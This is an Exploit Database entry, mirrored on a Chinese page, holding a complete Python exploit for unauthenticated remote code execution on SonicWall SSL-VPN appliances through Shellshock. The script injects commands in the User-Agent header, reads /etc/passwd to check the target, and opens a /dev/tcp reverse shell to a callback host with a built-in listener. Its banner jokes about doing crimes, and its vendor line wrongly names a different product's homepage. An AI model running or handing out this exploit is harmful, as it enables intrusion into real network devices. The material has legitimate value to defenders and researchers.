SonicWall SSL-VPN 8.0.0.0 – ‘visualdoor’ Remote Code Execution (Unauthenticated)

Exploit Database
131 阅读

作者： Darren Martyn

日期： 2021-01-29
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/49499/

100

101

102

103

104

105

106

# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)

# Exploit Author: Darren Martyn

# Vendor Homepage: https://www.home-assistant.io/

# Version: < SMA 8.0.0.4

# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

#!/usr/bin/python

# coding: utf-8

# Author: Darren Martyn

# Credit: Phineas Fisher

# Notes:

# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team

# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command

# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns

# a trivial reverse shell using /dev/tcp.

# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but

# implementing that is left as an exercise for the reader. I've seen a few approaches, and

# would be interested in seeing yours.

# There is another LPE that works only on some models which I also have removed from this.

# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

import requests

import sys

import telnetlib

import socket

from threading import Thread

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import time

def banner():

print """

8888

""88

8b d888,adPPYba,88 88,adPPYYba,88

8b d8'88I8[""88 88"" </code>Y888

8b d8' 88 </code>"Y8ba, 88 88,adPPPPP8888

8b,d8'88aa]8I"8a, ,a8888,,8888

"8"88</code>"YbbdP"' <code>"YbbdP'Y8</code>"8bbdP"Y888

,adPPYb,88 ,adPPYba,,adPPYba, 8b,dPPYba,

a8"<code>Y88a8" "8aa8" "8a88P' "Y8

8b 888b d88b d888

"8a, ,d88"8a, ,a8""8a, ,a8"88

</code>"8bbdP"Y8 <code>"YbbdP"'</code>"YbbdP"' 88

SonicWall SSL-VPN Appliance Remote Exploit

Public Release (Jan 2021). Author: Darren Martyn. Credit

goes to Phineas Fisher for this. Stay inside, do crimes.

"""

def handler(lp): # handler borrowed from Stephen Seeley.

print "(+) starting handler on port %d" %(lp)

t = telnetlib.Telnet()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.bind(("0.0.0.0", lp))

s.listen(1)

conn, addr = s.accept()

print "(+) connection from %s" %(addr[0])

t.sock = conn

print "(+) pop thy shell!"

t.interact()

def execute_command(target, command):

url = target + "/cgi-bin/jarrewrite.sh"

headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}

r = requests.get(url=url, headers=headers, verify=False)

return r.text

def check_exploitable(target):

print "(+) Testing %s for pwnability..." %(target)

output = execute_command(target=target, command="cat /etc/passwd")

if "root:" in output:

print "(*) We can continue, time to wreck this shit."

return True

else:

return False

def pop_reverse_shell(target, cb_host, cb_port):

print "(+) Sending callback to %s:%s" %(cb_host, cb_port)

backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)

execute_command(target=target, command=backconnect)

def hack_the_planet(target, cb_host, cb_port):

if check_exploitable(target) == True:

pass

else:

sys.exit("(-) Target not exploitable...")

handlerthr = Thread(target=handler, args=(int(cb_port),))

handlerthr.start()

pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)

def main(args):

banner()

if len(args) != 4:

sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))

hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])

if __name__ == "__main__":

main(args=sys.argv)